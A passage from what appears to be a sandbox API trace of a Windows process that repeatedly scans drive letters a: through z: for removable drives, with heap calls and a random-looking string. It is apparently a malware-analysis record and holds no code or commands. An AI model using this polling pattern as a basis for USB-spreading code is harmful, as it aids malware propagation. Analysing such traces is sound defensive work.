(HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0209.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0209.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0209.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0209.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0209.885] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0209.885] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0209.885] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0209.885] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0209.885] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0209.885] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0209.886] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0209.886] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0209.886] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0209.886] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0209.886] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0209.886] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0209.887] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0209.887] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0209.887] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0209.887] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0209.888] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0209.888] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0209.888] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0209.888] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0209.888] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0209.888] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0209.889] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0209.889] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0209.889] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0209.889] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0209.889] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0209.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0209.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0209.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0209.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0209.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0209.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0209.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0209.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0209.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0209.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0209.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0209.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0209.890] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0209.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0209.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0209.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fa0 [0209.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0209.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0209.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0209.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0209.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fa0 | out: hHeap=0x12c0000) returned 1 [0209.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0209.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0209.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0209.892] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0209.892] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0209.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0209.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0209.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0209.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0209.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0209.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0209.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0209.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0209.892] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0209.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0209.893] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0209.893] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0209.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0209.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0209.893] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0209.893] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0209.893] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0209.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0209.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0209.893] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0209.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0209.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0209.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0209.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0209.893] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0209.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0209.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0209.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0209.894] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0209.894] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0209.894] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0209.894] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0209.894] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0209.894] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0209.894] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0209.894] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0209.895] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0209.895] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0209.895] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0209.895] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0209.895] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0209.895] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0209.896] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0209.896] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0209.896] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0209.896] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0209.896] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0209.897] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0209.897] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0209.897] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0209.897] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0209.897] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0209.897] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0209.898] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0209.898] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0209.898] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0209.898] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0209.898] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0209.898] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0209.899] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0209.899] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0209.899] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0209.899] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0209.899] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0209.899] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0209.899] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0209.899] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0209.899] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0209.899] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0209.899] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.899] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0209.899] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0209.899] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0209.899] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f40 [0209.899] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0209.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0209.899] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0209.899] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0209.899] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f40 | out: hHeap=0x12c0000) returned 1 [0209.899] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0209.899] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0209.900] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0209.900] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.900] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0209.900] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.900] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0209.900] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0209.900] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0209.900] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0209.900] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0209.900] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0209.900] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0209.900] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0209.900] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0209.900] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0209.900] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0209.900] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0209.900] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0209.900] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0209.900] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0209.900] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0209.900] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0209.900] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0209.901] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0209.901] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0209.901] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.901] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0209.901] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0209.901] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0209.901] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0209.901] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0209.901] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0209.901] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0209.901] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0209.901] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0209.901] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0209.901] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0209.901] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0209.901] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0209.902] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0209.902] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0209.902] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0209.902] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0209.902] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0209.902] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0209.903] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0209.903] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0209.903] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0209.904] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0209.904] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0209.904] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0209.904] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0209.904] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0209.957] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0209.957] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0209.957] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0209.957] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0209.958] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0209.958] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0209.958] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0209.958] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0209.959] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0209.959] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0209.959] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0209.959] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0209.959] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0209.959] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0209.959] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0209.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0209.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0209.960] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0209.960] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0209.960] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0209.960] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0209.960] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0209.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0209.960] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.960] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0209.960] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0209.960] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0209.960] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f20 [0209.960] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0209.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0209.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0209.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0209.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f20 | out: hHeap=0x12c0000) returned 1 [0209.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0209.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0209.960] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0209.960] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0209.961] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0209.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0209.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0209.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0209.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0209.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0209.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0209.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0209.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0209.961] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0209.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0209.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0209.961] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0209.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0209.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0209.961] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0209.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0209.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0209.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0209.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0209.962] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0209.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0209.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0209.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0209.962] RtlAllocateHeap 